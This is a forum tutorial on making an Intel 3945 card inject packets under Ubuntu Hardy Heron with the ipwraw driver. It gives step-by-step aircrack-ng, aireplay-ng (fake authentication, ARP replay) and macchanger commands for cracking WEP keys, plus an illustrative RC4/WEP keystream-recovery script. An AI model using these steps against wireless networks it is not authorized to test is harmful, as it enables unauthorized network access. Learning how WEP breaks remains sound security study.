WEP Cracking under Hardy Heron using ipwraw driver
READ THIS FIRST:
There is nothing inherently wrong with penetration testing your own networks, and it is not illegal to possess or use any of the tools in my tutorial.
By the logic that some Linux applications can be misused, and that they are made for Linux, Linux itself can be misused. Even though Linux can be a powerful tool or a "weapon" in some hands, all Linux discussion should not be removed simply because of the possibility of misuse.
Providing people with the tools and knowledge to understand their own networks is a crucial step in the road to having better security. If you don't understand a problem, you can't give a solution. The more that people know and understand how the WEP encryption scheme is broken, the better they can protect themselves by using WPA or another standard that is more secure.
Quoting another source, which I cannot remember:
Note that you need formal permission from the owner of any wireless network you wish to audit. Under no circumstances must you compromise a network's security prior to obtaining approval from the owner of the network, and no support will be given to users who seek to do otherwise.
Your computer may become unstable and even hard-lock (this seems to be related to the injection speed; it is more prone to crash at 54M than at 1M), in which case you will need to do a hard reset of your machine; I can tell you that from my own experience while trying to do this. I recommend taking enough measures to safeguard your data in case you have to reinstall your OS, and PLEASE DO NOT TRY THIS ON PRODUCTION MACHINES.
Please note that I'm using ipwraw, which is now deprecated, since I was not able to find enough information on how to do packet injection under the new drivers.
A not so long trip... - Starting:
I am aware that there are many ways to accomplish WEP cracking once you can perform injection (kismet and others), but this is the way that worked for me since Gutsy Gibbon, and now I have managed to make it work on Hardy Heron.
One main issue since the Intel PRO/Wireless 3945ABG WLAN (802.11a/b/g) shipped was to make it work with Linux at all. One effort (now deprecated) was the project hosted at http://ipw3945.sourceforge.net/, which offered a driver that required a binary microcode, a binary user-space regulatory daemon, the ieee80211 subsystem, a Linux kernel >= 2.6.13, wireless extensions and tools, and a WPA supplicant [this will not be covered in this walk-through].
That effort has now been deprecated in favour of the iwlwifi drivers (you can read the history here: http://intellinuxwireless.org/?p=iwlwifi). As far as I am aware, they support the Intel PRO/Wireless 3945ABG WLAN (802.11a/b/g) out of the box.
There is always a but. Supporting packet injection is where the problems arose. Some distros (wifiway, if my memory serves) and some websites (seguridadwireless.com, if my memory serves) showed how to patch the drivers, and those steps have been ported to almost every Linux distro. With the binary drivers (ipw3945) and the ipwraw driver hosted at http://homepages.tu-darmstadt.de/~p_larbig/wlan/ you were able to perform packet injection.
Well, if you used those drivers, [almost] everything was OK. When I installed Ubuntu Hardy Heron, I was so happy that ipw3945 was gone and that the iwlwifi driver was in command now, until... I tried to test packet injection. Nothing worked. For a day or two (I cannot recall the total time...) I googled the WWW looking for a possible solution. No luck, I found nothing/nada [Had I entered the correct Google search terms? Perhaps]. I did stumble on some useful pages, though. Some of them uncovered the puzzle a little, and finally I was enlightened... [just joking about the enlightenment part]. This is a non-standard way... as you will see...
The point of this walk-through is to make the Intel 3945 chipset do packet injection under Hardy Heron, using the ipwraw driver provided by p_larbig. I'm working on various assumptions:
- you have managed to patch the ipw3945 drivers previously
- you own a Linux machine with Hardy Heron freshly installed; I have neither the time nor the will to test on an upgraded system
- you have managed to compile/install previous versions of the ipwraw driver
- you know how to use aircrack-ng
- you own a WEP (Wired Equivalent Privacy) network
- you can use the CLI (ahhhhhhhh, Linux, your CLI, a powerful tool and a headache)
- the CAPITAL LETTERS in the WEP key cracking part act as placeholders for
- CHANNEL, the channel which will be sniffed/injected
- FILE, a file name
- ESSID, the access point name, such as WEIRDNET, INFINITAS, DREAMRYCHE
- BSSID, the access point address
- MACADDRESS, your Wi-Fi MAC address
- you are using it at your own risk
- you know what the hell you are doing
A not so long trip... - Hands on:
You will need to type (or copy-paste into the CLI) the following.
The non-standard way:
sudo apt-get install linux-headers-`uname -r` build-essential libssl-dev macchanger
tar -xjf ipwraw-ng*
cd ipwraw-ng*/
make
sudo make install
sudo make install_ucode
echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw
sudo depmod -ae
(the cd and make lines build the extracted driver before it is installed; run all of this from the directory where you put the ipwraw-ng tarball)
Open gedit, copy and paste the following:
#!/bin/bash
# wepcrackconf.sh: put the ipwraw wifi0 interface on the target channel, rate and BSSID through sysfs; run it with sudo
echo "Please provide the wifi0 CHANNEL"
read canal
echo "Please provide the capture rate (best results with only 2)"
read rate
echo "Please provide the target BSSID"
read bssid
ifconfig wifi0 down
chmod u+wrx /sys/class/net/wifi0/device/rate
echo "$rate" >/sys/class/net/wifi0/device/rate
echo "$canal" >/sys/class/net/wifi0/device/channel
echo "$bssid" >/sys/class/net/wifi0/device/bssid
ifconfig wifi0 up
echo "Configuration completed. Ready to do packet injection"
Save it under a wise name such as wepcrackconf.sh and give it run permission by issuing
sudo chmod +x wepcrackconf.sh
sudo modprobe -r iwl3945
sudo modprobe ipwraw
Open four terminals.
First terminal (survey; note the CHANNEL, BSSID and ESSID of your own access point):
sudo iwconfig wifi0 rate 1M
sudo airodump-ng wifi0
Second terminal (run the configuration script and answer its prompts):
sudo ./wepcrackconf.sh
- channel, pick the channel you wish
- rate, always 2 (in the driver's rate file 2 means 1M, the same rate set with iwconfig above)
- bssid, taken from the previous terminal
Third terminal (capture that channel to a file):
sudo airodump-ng -c CHANNEL -w FILE wifi0
Fourth terminal (note your MAC address, then fake-authenticate with the access point, re-associating every 10 seconds):
sudo macchanger -s wifi0
sudo aireplay-ng -1 10 -e "ESSID" -a BSSID -h MACADDRESS wifi0
Back on the first terminal (stop the survey with Ctrl-C and start the ARP request replay, which makes the access point generate fresh IVs):
sudo aireplay-ng -3 -b BSSID -h MACADDRESS wifi0
After you have gathered enough IVs, stop the capture with a Ctrl-C keystroke and issue
sudo aircrack-ng FILE-01.cap
(airodump-ng adds a sequence number to the -w prefix, so the capture file is FILE-01.cap, not FILE.cap)
A not so long trip... - Comments:
To go back to the normal driver when you are done:
sudo modprobe -r ipwraw
sudo modprobe iwl3945
- the shell is now dash, not bash; the compile step will complain about it, but it seems to compile the ipwraw driver fine
- sudo make install, in the installing part, seems to be aware of the firmware status (patched?/not patched?)
- sudo make install_ucode, same as above
- In the non-standard way, make sure that the quotes are CLI quotes (straight quotes), not typographical ones
- In the non-standard way I'm using root powers to accomplish it. If you know another way to set the values, please let me know.
- On the cracking part, fourth terminal:
- you will probably get a message such as "20:45:20 wifi0 is on channel 13, but the AP uses channel 6"; just reissue the command
- gather at least 500,000 packets to crack a 64-bit hex WEP key (this is no longer the case since the new PTW attack, which is built into aircrack-ng and used by these instructions; these days anything between 20,000 and 50,000 packets will succeed in cracking 128-bit WEP!) <- Thanks Noahod
- you can change the MAC address; just read the macchanger info or man page
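As an added illustration of why the IV count matters (this is not part of the original tutorial and not aircrack-ng code): WEP builds each packet's RC4 key as IV || shared key, sends the 24-bit IV in the clear, and every ARP or IPv4 payload starts with the same LLC/SNAP header, so each captured packet hands an observer the first keystream bytes for its IV. The Python below, written for this page, implements RC4 and WEP-style encryption over constructed frames with a constructed 40-bit key (no real network's key), builds a per-IV keystream dictionary from ARP requests like those aireplay-ng -3 replays, and uses it to read the start of an unrelated packet that reuses an IV. It does not implement PTW; that attack takes these same known keystream bytes from tens of thousands of IVs and recovers the key statistically, which is why the packet counts above are what they are.

```python
import struct
import zlib

# Constructed 40-bit WEP key for this demo only; it is not any real network's key.
DEMO_KEY = bytes.fromhex("0123456789")

# LLC/SNAP header preceding every ARP (0x0806) or IPv4 (0x0800) payload in an
# 802.11 data frame; identical on every network, so an observer knows it.
SNAP_ARP = bytes.fromhex("aaaa030000000806")
SNAP_IP = bytes.fromhex("aaaa030000000800")
# ARP request fields that never change: HTYPE=Ethernet, PTYPE=IPv4, HLEN=6, PLEN=4, OP=request
ARP_REQ_HEADER = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)
KNOWN_ARP_PREFIX = SNAP_ARP + ARP_REQ_HEADER  # 16 plaintext bytes known for every ARP request


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling followed by keystream generation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP: append the CRC-32 ICV, RC4 under the per-packet key IV||key, prepend the IV in the clear."""
    data = payload + struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)
    return iv + xor(data, rc4(iv + key, len(data)))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Legitimate receiver: strip the IV, run RC4, verify the ICV."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4(iv + key, len(body)))
    payload, icv = data[:-4], data[-4:]
    if struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF) != icv:
        raise ValueError("ICV mismatch")
    return payload


def arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """Constructed ARP request payload, the kind of packet aireplay-ng -3 captures and replays."""
    return KNOWN_ARP_PREFIX + sender_mac + sender_ip + bytes(6) + target_ip


def keystream_dictionary(frames, known_prefix: bytes) -> dict:
    """Known plaintext: ciphertext XOR known plaintext gives the keystream prefix for that IV."""
    table = {}
    for frame in frames:
        iv, body = frame[:3], frame[3:]
        table[iv] = xor(body[: len(known_prefix)], known_prefix)
    return table


def peek_with_dictionary(table: dict, frame: bytes) -> bytes:
    """Read the start of any frame whose IV is already in the table, without knowing the key."""
    iv, body = frame[:3], frame[3:]
    keystream = table[iv]
    return xor(body[: len(keystream)], keystream)


def demo(key: bytes = DEMO_KEY):
    # Sniffed ARP requests; there are only 2^24 IVs, and many cards walk them sequentially.
    arp = arp_request(bytes.fromhex("001122334455"), bytes([192, 168, 1, 10]), bytes([192, 168, 1, 1]))
    captured = [wep_encrypt(key, iv.to_bytes(3, "big"), arp) for iv in range(1, 6)]
    table = keystream_dictionary(captured, KNOWN_ARP_PREFIX)
    # A later IPv4 packet from another station reuses IV 3 (constructed IPv4 header start).
    ip_payload = SNAP_IP + bytes.fromhex("4500005412340000") + b"payload"
    victim = wep_encrypt(key, (3).to_bytes(3, "big"), ip_payload)
    leaked = peek_with_dictionary(table, victim)
    return leaked, ip_payload[: len(leaked)]


if __name__ == "__main__":
    leaked, expected = demo()
    print("recovered:", leaked.hex(), "matches plaintext:", leaked == expected)
```

The recovered bytes include the IP total length and identification fields of a packet the attacker never had the key for, and the only ingredient was a second packet under the same IV; the ARP replay in the fourth terminal exists precisely to make the access point burn through IVs quickly.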
A not so long trip... - Troubleshooting:
- echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw seems not to blacklist the ipwraw module: check that the quotes are CLI quotes, NOT typographical quotes, and issue the command again
- If you cannot connect (after issuing all the commands or after a hard reset), just disable the ipw drivers and restart
A not so long trip... - ACKs and references:
In no particular order
A not so long trip... - Misc:
English is not my mother tongue; please be gentle with some grammatical errors. PM me and I will correct them ASAP.
Based loosely on the XAsmodeanX tutorial (http://ubuntuforums.org/showthread.php?t=514723)
A not so long trip... - Updates
- There is a tool called wesside-ng, which is in beta in the aircrack-ng suite. It performs all the operations required to crack a WEP key, but IMHO it is quite unstable. It gave me 2 hard-locks in a row.
- If you fail to reduce the capture rate the computer may crash... I learned this the hard way